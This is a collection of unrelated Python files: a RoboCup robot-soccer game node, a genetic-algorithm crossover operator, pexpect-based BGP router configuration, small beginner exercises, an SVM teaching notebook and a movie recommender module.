self._my_pose, ball_info, self._control_target,
Pose2D(Field.field('length')*0.25, 0, 0),
receive_enable=True, receiver_role_exist=Observer.role_is_exist(role.ROLE_ID["ROLE_ZONE_1"]),
robot_info=robot_info, direct=True)
elif self._my_role == role.ROLE_ID["ROLE_ZONE_1"]:
self._control_target = normal.move_to(
self._control_target, Pose2D(Field.field('length')*0.25,0,0), ball_info, look_ball=True)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_INDIRECT_FREE"]:
rospy.logdebug("OUR_INDIRECT_FREE")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = offense.setplay_pass(
self._my_pose, ball_info, self._control_target,
Pose2D(Field.field('length')*0.25, 0, 0),
receive_enable=True, receiver_role_exist=Observer.role_is_exist(role.ROLE_ID["ROLE_ZONE_1"]),
robot_info=robot_info)
elif self._my_role == role.ROLE_ID["ROLE_ZONE_1"]:
self._control_target = normal.move_to(
self._control_target, Pose2D(Field.field('length')*0.25,0,0), ball_info, look_ball=True)
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["OUR_TIMEOUT"]:
rospy.logdebug("OUR_TIMEOUT")
# 自チームのタイムアウトではロボットを停止させる
self._control_target, remake_path= normal.stop(self._control_target)
avoid_obstacle = False # 障害物回避しない
elif referee.referee_id == ref.REFEREE_ID["OUR_BALL_PLACEMENT"]:
rospy.logdebug("OUR_BALL_PLACEMENT")
replace_pose = referee.placement_position
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target, avoid_ball = ball_placement.basic_ball_placement(self._control_target, replace_pose, ball_info, robot_info, self._MY_ID, 'atk', [Field.field('length'), Field.field('width')])
elif self._my_role == role.ROLE_ID["ROLE_CENTER_BACK_1"]:
self._control_target, avoid_ball = ball_placement.basic_ball_placement(self._control_target, replace_pose, ball_info, robot_info, self._MY_ID, 'recv', [Field.field('length'), Field.field('width')])
else:
self._control_target, avoid_ball = ball_placement.avoid_ball_place_line(
self._my_pose, ball_info, replace_pose, self._control_target)
elif referee.referee_id == ref.REFEREE_ID["THEIR_KICKOFF_PREPARATION"] \
or referee.referee_id == ref.REFEREE_ID["THEIR_KICKOFF_START"]:
rospy.logdebug("THEIR_KICKOFF")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.6)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["THEIR_PENALTY_PREPARATION"] \
or referee.referee_id == ref.REFEREE_ID["THEIR_PENALTY_START"]:
rospy.logdebug("THEIR_PENALTY")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
else:
self._control_target, remake_path = normal.make_line(
self._my_role, ball_info, self._control_target,
start_x=-Field.field("length")*0.5,
start_y=Field.field("width")*0.4,
add_x=0.4, add_y=0)
elif referee.referee_id == ref.REFEREE_ID["THEIR_DIRECT_FREE"]:
rospy.logdebug("THEIR_DIRECT")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.6)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info,zone_enable=True)
elif referee.referee_id == ref.REFEREE_ID["THEIR_INDIRECT_FREE"]:
rospy.logdebug("THEIR_INDIRECT")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.6)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info, zone_enable=True)
elif referee.referee_id == ref.REFEREE_ID["THEIR_TIMEOUT"]:
rospy.logdebug("THEIR_TIMEOUT")
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
self._control_target = offense.interpose(ball_info,
self._control_target, dist_from_target=0.6)
avoid_ball = True
else:
self._control_target = assign.assign(
self._my_role, ball_info, self._control_target,
self._my_pose, defense_num, robot_info)
elif referee.referee_id == ref.REFEREE_ID["THEIR_BALL_PLACEMENT"]:
rospy.logdebug("THEIR_BALL_PLACEMENT")
replace_pose = referee.placement_position
if self._my_role == role.ROLE_ID["ROLE_GOALIE"]:
self._control_target = goalie.interpose(
ball_info, robot_info, self._control_target)
avoid_obstacle = False # 障害物回避しない
# elif self._my_role == role.ROLE_ID["ROLE_ATTACKER"]:
# self._control_target = offense.interpose(ball_info,
# self._control_target, dist_from_target=0.6)
# avoid_ball = True
else:
self._control_target, avoid_ball = ball_placement.avoid_ball_place_line(
self._my_pose, ball_info, replace_pose, self._control_target,
force_avoid=True)
# self._control_target = assign.assign(
# self._my_role, ball_info, self._control_target,
# self._my_pose, defense_num, robot_info)
# 障害物回避の経路作成
if avoid_obstacle:
self._control_target.path = obstacle_avoidance.add_path(
self._control_target.path, self._my_pose, avoid_ball)
return self._control_target
class Game(object):
def __init__(self):
QUEUE_SIZE = 1
self._FAR_DISTANCE = 1e+10
self._OUR_COLOR = rospy.get_param('consai2_description/our_color', 'blue')
self._MAX_ID = rospy.get_param('consai2_description/max_id', 15)
self._GOALIE_ID = rospy.get_param('consai2_description/goalie_id', 0)
self._THEIR_COLOR = 'yellow'
if self._OUR_COLOR == 'yellow':
self._THEIR_COLOR = 'blue'
self._robot_node = []
for robot_id in range(self._MAX_ID + 1):
self._robot_node.append(RobotNode(robot_id))
# ゴーリーを割り当てる
# ゴーリーはconsai2起動時のみにしか変更しない
if robot_id == self._GOALIE_ID:
self._robot_node[robot_id].set_goalie()
self._roledecision = role.RoleDecision(self._MAX_ID, self._GOALIE_ID)
self._sub_geometry = rospy.Subscriber(
'vision_receiver/raw_vision_geometry', VisionGeometry,
self._callback_geometry, queue_size=1)
self._decoded_referee = DecodedReferee()
self._sub_decoded_referee = rospy.Subscriber(
'referee_wrapper/decoded_referee', DecodedReferee,
self._callback_referee, queue_size=1)
self._ball_info = BallInfo()
self._sub_ball_info = rospy.Subscriber(
'vision_wrapper/ball_info', BallInfo,
self._callback_ball_info, queue_size=1)
self._robot_info = {'our':[],'their':[]}
self._subs_robot_info = {'our':[],'their':[]}
self._pubs_control_target = []
for robot_id in range(self._MAX_ID + 1):
# 末尾に16進数の文字列をつける
topic_id = hex(robot_id)[2:]
self._robot_info['our'].append(RobotInfo())
self._robot_info['their'].append(RobotInfo())
topic_name = 'vision_wrapper/robot_info_' + self._OUR_COLOR + '_' + topic_id
sub_robot_info = rospy.Subscriber(topic_name, RobotInfo,
self._callback_our_info, queue_size=QUEUE_SIZE,
callback_args=robot_id)
self._subs_robot_info['our'].append(sub_robot_info)
topic_name = 'vision_wrapper/robot_info_' + self._THEIR_COLOR + '_' + topic_id
sub_robot_info = rospy.Subscriber(topic_name, RobotInfo,
self._callback_their_info, queue_size=QUEUE_SIZE,
callback_args=robot_id)
self._subs_robot_info['their'].append(sub_robot_info)
topic_name = 'consai2_game/control_target_' + self._OUR_COLOR+'_' + topic_id
pub_control_target = rospy.Publisher(topic_name, ControlTarget,
queue_size=1)
self._pubs_control_target.append(pub_control_target)
# 障害物回避のためのクラス
self._obstacle_avoidance = avoidance.ObstacleAvoidance()
def _callback_geometry(self, msg):
Field.update(msg)
def _callback_referee(self, msg):
self._decoded_referee = msg
def _callback_ball_info(self, msg):
self._ball_info = msg
def _callback_our_info(self, msg, robot_id):
self._robot_info['our'][robot_id] = msg
def _callback_their_info(self, msg, robot_id):
self._robot_info['their'][robot_id] = msg
def update(self):
Observer.update_ball_is_moving(self._ball_info)
Observer.update_role_is_exist(self._roledecision._rolestocker._role_is_exist)
self._roledecision.set_disappeared([i.disappeared for i in self._robot_info['our']])
if tool.is_in_defense_area(self._ball_info.pose, 'our') is False \
and Observer.ball_is_moving() is False:
# ボールが自チームディフェンスエリア外にあり
# ボールが動いていないとき、アタッカーの交代を考える
self._roledecision.check_ball_dist([i.pose for i in self._robot_info['our']], self._ball_info)
self._roledecision.event_observer()
defense_num = self._roledecision._rolestocker._defense_num
self._obstacle_avoidance.update_obstacles(self._ball_info, self._robot_info)
for our_info in self._robot_info['our']:
robot_id = our_info.robot_id
target = ControlTarget()
# ロールの更新
self._robot_node[robot_id]._my_role = self._roledecision._rolestocker._my_role[robot_id]
if our_info.disappeared:
# ロボットが消えていたら停止
target = self._robot_node[robot_id].get_sleep()
else:
# ロボットの状態を更新
self._robot_node[robot_id].set_state(
our_info.pose, our_info.velocity)
# 目標位置を生成
target = self._robot_node[robot_id].get_action(
self._decoded_referee,
self._obstacle_avoidance,
self._ball_info,
self._robot_info,
defense_num)
self._pubs_control_target[robot_id].publish(target)
def main():
rospy.init_node('game')
game = Game()
r = rospy.Rate(60)
while not rospy.is_shutdown():
game.update()
r.sleep()
if __name__ == '__main__':
main()
|
'''
Cross over operators for evolutionary algorithms
'''
import numpy as np
from abc import ABC, abstractmethod
class AbstractCrossoverOperator(ABC):
@abstractmethod
def crossover(self, parent_a, parent_b):
pass
class PartiallyMappedCrossover(AbstractCrossoverOperator):
'''
Partially Mapped Crossover operator
'''
def __init__(self):
pass
def crossover(self, parent_a, parent_b):
child_a = self._pmx(parent_a.copy(), parent_b)
child_b = self._pmx(parent_b.copy(), parent_a)
return child_a, child_b
def _pmx(self, child, parent_to_cross):
x_indexes = np.sort(np.random.randint(0, len(child), size=2))
for index in range(x_indexes[0], x_indexes[1]):
city = parent_to_cross[index]
swap_index = np.where(child == city)[0][0]
child[index], child[swap_index] = child[swap_index], child[index]
return child
|
import time
import pexpect
import execute
import Devices
import clear_buffer
import getdata
class IBGP:
def Configure_IBGP(self, Device, AS_id, Interface, Action):
device_data = getdata.get_data()
hostname = device_data['Device_Details'][Device]['Hostname']
Dev = Devices.Devices()
child = Dev.connect(Device)
if child:
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
child.sendcontrol('m')
child.sendcontrol('m')
flag = child.expect([hostname+'>', hostname+'#', 'Router\>', 'Router\#', \
pexpect.EOF, pexpect.TIMEOUT], timeout=90)
if flag in (0, 2):
Dev.Login(Device, child)
if Action == 'enable':
if isinstance(Interface, list):
for interface in Interface:
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
neighbor %s update-source loopback 0
exit
exit
""" % (AS_id, interface, AS_id, interface)
commands = configs.split('\n')
execute.execute(child, commands)
time.sleep(6)
child.sendcontrol('m')
child.sendline('exit')
child.sendcontrol('m')
else:
interface = Interface
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
neighbor %s update-source loopback 0
exit
exit
""" % (AS_id, interface, AS_id, interface)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
else:
unconfig = """
configure terminal
no router bgp %d
exit
exit
""" % (AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
if flag in (1, 3):
if Action == 'enable':
if isinstance(Interface, list):
for interface in Interface:
print(interface)
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
neighbor %s update-source loopback 0
exit
exit
""" % (AS_id, interface, AS_id, interface)
commands = configs.split('\n')
execute.execute(child, commands)
time.sleep(6)
child.sendcontrol('m')
child.sendline('exit')
child.sendcontrol('m')
else:
interface = Interface
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
neighbor %s update-source loopback 0
exit
exit
exit
""" % (AS_id, interface, AS_id, interface)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
else:
unconfig = """
configure terminal
no router bgp %d
exit
exit
""" % (AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
return True
else:
return False
def enable_syn(self, Device, AS_id):
device_data = getdata.get_data()
hostname = device_data['Device_Details'][Device]['Hostname']
Dev = Devices.Devices()
child = Dev.connect(Device)
if child:
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
child.sendcontrol('m')
child.sendcontrol('m')
flag = child.expect([hostname+'>', hostname+'#', 'Router\>', 'Router\#', \
pexpect.EOF, pexpect.TIMEOUT], timeout=90)
if flag in (0, 2):
Dev.Login(Device, child)
configs = """
configure terminal
router bgp %d
synchronization
end
""" % (AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
if flag in (1, 3):
configs = """
configure terminal
router bgp %d
synchronization
end
""" % (AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
return True
else:
return False
def Configure_EBGP(self, Device, AS_id, Interface, neighbor_AS_id, Action, NW_id, Mask):
device_data = getdata.get_data()
hostname = device_data['Device_Details'][Device]['Hostname']
Dev = Devices.Devices()
child = Dev.connect(Device)
port = device_data['Device_Details'][Device]['port']
if port != "zebra":
if child:
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
child.sendcontrol('m')
child.sendcontrol('m')
flag = child.expect([hostname+'>', hostname+'#', 'Router\>', 'Router\#', \
pexpect.EOF, pexpect.TIMEOUT], timeout=90)
if flag in (0, 2):
Dev.Login(Device, child)
if Action == 'enable':
if isinstance(Interface, list):
for interface in Interface:
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
network %s mask %s
exit
exit
""" % (AS_id, interface, neighbor_AS_id, NW_id, Mask)
commands = configs.split('\n')
execute.execute(child, commands)
time.sleep(6)
child.sendcontrol('m')
child.sendline('exit')
child.sendcontrol('m')
else:
interface = Interface
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
network %s mask %s
exit
exit
""" % (AS_id, interface, neighbor_AS_id, NW_id, Mask)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
else:
unconfig = """
configure terminal
no router bgp %d
exit
exit
""" % (AS_id)
commands = unconfig.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
if flag in (1, 3):
if Action == 'enable':
if isinstance(Interface, list):
for interface in Interface:
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
network %s mask %s
exit
exit
""" % (AS_id, interface, neighbor_AS_id, NW_id, Mask)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
child.sendline('exit')
child.sendcontrol('m')
else:
interface = Interface
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
network %s mask %s
exit
exit
""" % (AS_id, interface, neighbor_AS_id, NW_id, Mask)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
else:
unconfig = """
configure terminal
no router bgp %d
exit
exit
""" % (AS_id)
commands = unconfig.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
return True
elif port == 'zebra':
port = "bgpd"
device_data = getdata.get_data()
IP_add = device_data['Device_Details'][Device]['ip_add']
child = pexpect.spawn('telnet ' + IP_add + ' ' + port)
hostname = device_data['Device_Details'][Device]['Hostname']
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
flag = (child.expect(['bgpd*', 'Password*', \
pexpect.EOF, pexpect.TIMEOUT], timeout=100))
if flag == 1:
child.send('zebra')
child.sendcontrol('m')
flag = child.expect(['bgpd*>', pexpect.EOF, \
pexpect.TIMEOUT], timeout=50)
if flag == 0:
child.send('enable')
child.sendcontrol('m')
if child:
flag = child.expect(['bgpd#*', pexpect.EOF, \
pexpect.TIMEOUT], timeout=90)
if flag == 0:
Dev.Login(Device, child)
if Action == 'enable':
if isinstance(Interface, list):
for interface in Interface:
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
network %s
exit
exit
""" % (AS_id, interface, neighbor_AS_id, NW_id)
commands = configs.split('\n')
execute.execute(child, commands)
time.sleep(6)
child.sendcontrol('m')
child.sendline('exit')
child.sendcontrol('m')
else:
interface = Interface
configs = """
configure terminal
router bgp %d
neighbor %s remote-as %d
network %s
exit
exit
""" % (AS_id, interface, neighbor_AS_id, NW_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
else:
unconfig = """
configure terminal
no router bgp %d
exit
exit
""" % (AS_id)
commands = unconfig.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
return True
else:
return False
def advertising_loopback(self, Device, AS_id, Interface, mask):
device_data = getdata.get_data()
hostname = device_data['Device_Details'][Device]['Hostname']
Dev = Devices.Devices()
child = Dev.connect(Device)
if child:
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
child.sendcontrol('m')
child.sendcontrol('m')
flag = child.expect([hostname+'>', hostname+'#', 'Router\>', 'Router\#', \
pexpect.EOF, pexpect.TIMEOUT], timeout=90)
if flag in (0, 2):
Dev.Login(Device, child)
configs = """
configure terminal
router bgp %d
network %s mask %s
end
""" % (AS_id, Interface, mask)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
if flag in (1, 3):
configs = """
configure terminal
router bgp %d
network %s mask %s
end
""" % (AS_id, Interface, mask)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
return True
else:
return False
def redistribution(self, Device, AS_id, Process_id=None):
device_data = getdata.get_data()
hostname = device_data['Device_Details'][Device]['Hostname']
Dev = Devices.Devices()
child = Dev.connect(Device)
if child:
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
child.sendcontrol('m')
child.sendcontrol('m')
flag = child.expect([hostname+'>', hostname+'#', 'Router\>', \
'Router\#', pexpect.EOF, pexpect.TIMEOUT], timeout=90)
if flag in (0, 2):
Dev.Login(Device, child)
configs = """
configure terminal
router bgp %d
redistribute ospf %d
exit
router ospf %d
redistribute bgp %d subnets
end
""" % (AS_id, Process_id, Process_id, AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
if flag in (1, 3):
configs = """
configure terminal
router bgp %d
redistribute ospf %d
exit
router ospf %d
redistribute bgp %d subnets
end
""" % (AS_id, Process_id, Process_id, AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
return True
else:
return False
def route(self, Device, AS_id, Interface):
device_data = getdata.get_data()
hostname = device_data['Device_Details'][Device]['Hostname']
Dev = Devices.Devices()
child = Dev.connect(Device)
if child:
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
child.sendcontrol('m')
child.sendcontrol('m')
flag = child.expect([hostname+'>', hostname+'#', 'Router\>', 'Router\#', \
pexpect.EOF, pexpect.TIMEOUT], timeout=90)
if flag in (0, 2):
Dev.Login(Device, child)
configs = """
configure terminal
router bgp %d
neighbor %s next-hop-self
end
""" % (AS_id, Interface)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
if flag in (1, 3):
configs = """
configure terminal
router bgp %d
neighbor %s next-hop-self
end
""" % (AS_id, Interface)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
return True
else:
return False
def redistribution_connected(self, Device, AS_id):
device_data = getdata.get_data()
hostname = device_data['Device_Details'][Device]['Hostname']
Dev = Devices.Devices()
child = Dev.connect(Device)
port = device_data['Device_Details'][Device]['port']
if port != "zebra":
if child:
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
child.sendcontrol('m')
child.sendcontrol('m')
flag = child.expect([hostname+'>', hostname+'#', 'Router\>', 'Router\#', \
pexpect.EOF, pexpect.TIMEOUT], timeout=90)
if flag in (0, 2):
Dev.Login(Device, child)
configs = """
configure terminal
router bgp %d
redistribute connected
end
""" % (AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
if flag in (1, 3):
configs = """
configure terminal
router bgp %d
redistribute connected
end
""" % (AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
return True
elif port == 'zebra':
port = "bgpd"
device_data = getdata.get_data()
IP_add = device_data['Device_Details'][Device]['ip_add']
child = pexpect.spawn('telnet ' + IP_add + ' ' + port)
hostname = device_data['Device_Details'][Device]['Hostname']
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
flag = (child.expect(['bgpd*', 'Password*', pexpect.EOF,\
pexpect.TIMEOUT], timeout=100))
if flag == 1:
child.send('zebra')
child.sendcontrol('m')
flag = child.expect(['bgpd*>', pexpect.EOF,\
pexpect.TIMEOUT], timeout=50)
if flag == 0:
child.send('enable')
child.sendcontrol('m')
if child:
clear_buffer.flushBuffer(1, child)
child.sendcontrol('m')
child.sendcontrol('m')
child.sendcontrol('m')
flag = child.expect(['bgpd#*', pexpect.EOF, \
pexpect.TIMEOUT], timeout=90)
if flag in (0, 2):
Dev.Login(Device, child)
configs = """
configure terminal
router bgp %d
redistribute connected
end
""" % (AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
if flag in (1, 3):
configs = """
configure terminal
router bgp %d
redistribute connected
end
""" % (AS_id)
commands = configs.split('\n')
execute.execute(child, commands)
child.sendcontrol('m')
return True
else:
return False
|
import math
v = float(input('Digite um ângulo: '))
s = math.sin(v)
c = math.cos(v)
t = math.tan(v)
print('O valor {}º corresponde aos valores: \nSeno {:.3f} \nCosseno {:.3f} \nTangente {:.3f}'.format(v, s, c, t))
|
# coding: utf-8
# ### scikit-learn中的SVM
# In[1]:
import numpy as np
import matplotlib.pyplot as plt
# In[3]:
# 因为SVM只能处理二分类问题,因此该样例只能取两个分类来训练
from sklearn import datasets
iris = datasets.load_iris()
X = iris.data
y = iris.target
X = X[y < 2, :2]
y = y[y < 2]
# In[22]:
plt.scatter(X[y==0, 0], X[y==0, 1], color='r')
plt.scatter(X[y==1, 0], X[y==1, 1], color='b')
plt.show()
# In[5]:
from sklearn.preprocessing import StandardScaler
standardScaler = StandardScaler()
standardScaler.fit(X)
X_standard = standardScaler.transform(X)
# In[6]:
from sklearn.svm import LinearSVC
svc = LinearSVC(C=1e9)
svc.fit(X_standard, y)
# In[7]:
# 封装一个函数,可绘制出决策边界情况
def plot_decision_boundary(model, axis):
x0, x1 = np.meshgrid(
np.linspace(axis[0], axis[1], int((axis[1]-axis[0])*100)).reshape(-1, 1),
np.linspace(axis[2], axis[3], int((axis[3]-axis[2])*100)).reshape(-1, 1)
)
X_new = np.c_[x0.ravel(), x1.ravel()]
y_predict = model.predict(X_new)
zz = y_predict.reshape(x0.shape)
from matplotlib.colors import ListedColormap
custom_cmap = ListedColormap(['#EF9A9A', '#FFF59D', '#90CAF9'])
plt.contourf(x0, x1, zz, linewidth=5, cmap=custom_cmap)
# In[9]:
plot_decision_boundary(svc, axis=[-3, 3, -3, 3])
plt.scatter(X_standard[y==0, 0], X_standard[y==0, 1])
plt.scatter(X_standard[y==1, 0], X_standard[y==1, 1])
plt.show()
# In[24]:
svc2 = LinearSVC(C=0.01)
svc2.fit(X_standard, y)
# In[25]:
plot_decision_boundary(svc2, axis=[-3, 3, -3, 3])
plt.scatter(X_standard[y==0, 0], X_standard[y==0, 1])
plt.scatter(X_standard[y==1, 0], X_standard[y==1, 1])
plt.show()
# In[26]:
svc.coef_
# In[27]:
svc.intercept_
# In[28]:
def plot_svc_decision_boundary(model, axis):
x0, x1 = np.meshgrid(
np.linspace(axis[0], axis[1], int((axis[1]-axis[0])*100)).reshape(-1, 1),
np.linspace(axis[2], axis[3], int((axis[3]-axis[2])*100)).reshape(-1, 1)
)
X_new = np.c_[x0.ravel(), x1.ravel()]
y_predict = model.predict(X_new)
zz = y_predict.reshape(x0.shape)
from matplotlib.colors import ListedColormap
custom_cmap = ListedColormap(['#EF9A9A', '#FFF59D', '#90CAF9'])
plt.contourf(x0, x1, zz, linewidth=5, cmap=custom_cmap)
w = model.coef_[0]
b = model.intercept_[0]
# 有了w、b,决策边界就是w0 * x0 + w1 * x1 + b = 0
# 即 x1 = -w0/w1 * x0 - b/w1
plot_x = np.linspace(axis[0], axis[1], 200)
# 同理,决策边界的上支撑边界就是w0 * x0 + w1 * x1 + b = 1
# 即 x1 = -w0/w1 * x0 - b/w1 + 1/w1
up_y = -w[0]/w[1] * plot_x - b/w[1] + 1/w[1]
# 同理,决策边界的下支撑边界就是w0 * x0 + w1 * x1 + b = -1
# 即 x1 = -w0/w1 * x0 - b/w1 - 1/w1
down_y = -w[0]/w[1] * plot_x - b/w[1] - 1/w[1]
# 做一下过滤,只绘制在axis[2]~axis[3]范围内的点
up_index = (up_y >= axis[2]) & (up_y <= axis[3])
down_index = (down_y >= axis[2]) & (down_y <= axis[3])
plt.plot(plot_x[up_index], up_y[up_index], color='black')
plt.plot(plot_x[down_index], down_y[down_index], color='black')
# In[29]:
plot_svc_decision_boundary(svc, axis=[-3, 3, -3, 3])
plt.scatter(X_standard[y==0, 0], X_standard[y==0, 1])
plt.scatter(X_standard[y==1, 0], X_standard[y==1, 1])
plt.show()
# In[30]:
plot_svc_decision_boundary(svc2, axis=[-3, 3, -3, 3])
plt.scatter(X_standard[y==0, 0], X_standard[y==0, 1])
plt.scatter(X_standard[y==1, 0], X_standard[y==1, 1])
plt.show()
|
from dicelib import dice
dice_list = []
for _ in range(0, 5):
new_dice = dice.Dice()
new_dice.roll()
dice_list.append(new_dice)
print(sum(dice_list))
|
# 1.Basic - Print all integers from 0 to 150.
for i in range(0, 151):
print(i)
# 2.Multiples of Five - Print all the multiples of 5 from 5 to 1,000
for i in range (5,10001):
if i%5 == 0:
print(i)
# 3.Counting, the Dojo Way - Print integers 1 to 100. If divisible by 5, print "Coding" instead. If divisible by 10, print "Coding Dojo".
for i in range(1,101):
if i%5==0:
print("Coding")
if i%10==0:
print("Coding Dojo")
else:
print(i)
# 4.Whoa. That Sucker's Huge - Add odd integers from 0 to 500,000, and print the final sum.
sum=0
for i in range(0, 500000):
if not i%2==0:
sum =sum+i
print(sum)
# 5.Countdown by Fours - Print positive numbers starting at 2018, counting down by fours.
for i in range(2018,0,-4):
print(i)
# 6.Flexible Counter - Set three variables: lowNum, highNum, mult. Starting at lowNum and going through highNum, print only the integers that are a multiple of mult. For example, if lowNum=2, highNum=9, and mult=3, the loop should print 3, 6, 9 (on successive lines)
lowNum=2
highNum=10
mult=2
for i in range(lowNum, highNum+1):
if i%mult ==0:
print(i)
|
import os
import sys
import json
import os.path
import requests as req
import numpy as np
import pandas as pd
from surprise import Dataset
from surprise import Reader, Dataset, SVD
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from joblib import (load, dump)
from tensorflow.keras.models import (Model, load_model)
from util import *
from personal.eda import *
from personal.svd import *
from personal.nn import *
from trending.demographic import *
from history.becauseyouwatched import *
movie_df = pd.read_csv(os.path.join(os.path.dirname(__file__), "../", "input", "movies_metadata.csv"))
movie_credits_df = pd.read_csv(os.path.join(os.path.dirname(__file__), "../", "input", "credits.csv"))
user_ratings_ds = get_ratings_small()
SVD_MODEL = generate_model_svd()
def get_trending_movies():
"""
Get popular movies by demographic
"""
# Clean columns for result
movies = get_top_k_movies(10)
movies = append_imdb_id_to_df(movies)
movies = format_data_objects(movies)
movies = movies.apply(get_movie_poster_and_trailer, axis=1, get_trailer=True)
return movies.to_json(orient='records')
def get_top_10_similar(movie_id, use_overview_for_similarity=False):
"""
Given a movie id, return the top 10 similar movies.
"""
movie = []
movie.append(int(movie_id))
movie = get_movies_from_ids(movie)
title = str(movie['title'].item())
top_ten_similar = get_k_recommendations_based_on_soup(title , 10).tolist()
ds = get_movies_dataset()
top_ten_ids = [int(get_movie_id_by_title(ds, str(x))) for x in top_ten_similar]
top_ten_similar = format_data_objects(get_movies_from_ids(top_ten_ids))
top_ten_similar = top_ten_similar.apply(get_movie_poster_and_trailer, axis=1, get_trailer=True)
top_ten_similar = append_imdb_id_to_df(top_ten_similar)
return top_ten_similar.to_json(orient='records')
def get_rating(user_id):
"""
Get top 10 most highly rated movies based on user's watch history
Uses the pre-trained neural network
"""
prediction = get_top_scores(user_id, 10)
#_, prediction = predict_score_nn(user_id, movie_id , trained_model=_get_predictor_nn(False, True)[1])
moviel = [x[0] for x in prediction]
movie = format_data_objects(get_movies_from_ids(moviel))
#movie['predicted_rating'] = (prediction[0])[1]
movies = movie.apply(get_movie_poster_and_trailer, axis=1, get_trailer=True)
return append_imdb_id_to_df(movies).to_json(orient='records')
def get_rating_svd(user_id):
"""
Get top 10 most highly rated movies based on user's watch history
Uses the SVD model
"""
prediction = get_top_k_predictions(get_all_predictions_svd(user_id), 10)
print(prediction[0][0])
moviel = [x[1] for x in prediction]
movie = format_data_objects(get_movies_from_ids(moviel))
movies = movie.apply(get_movie_poster_and_trailer, axis=1, get_trailer=True)
return append_imdb_id_to_df(movies).to_json(orient='records')
def get_movie_by_id(movie_id):
mids = []
mids.append(int(movie_id))
movie = format_data_objects(get_movies_from_ids(mids))
movie = get_movie_poster_and_trailer(movie, True)
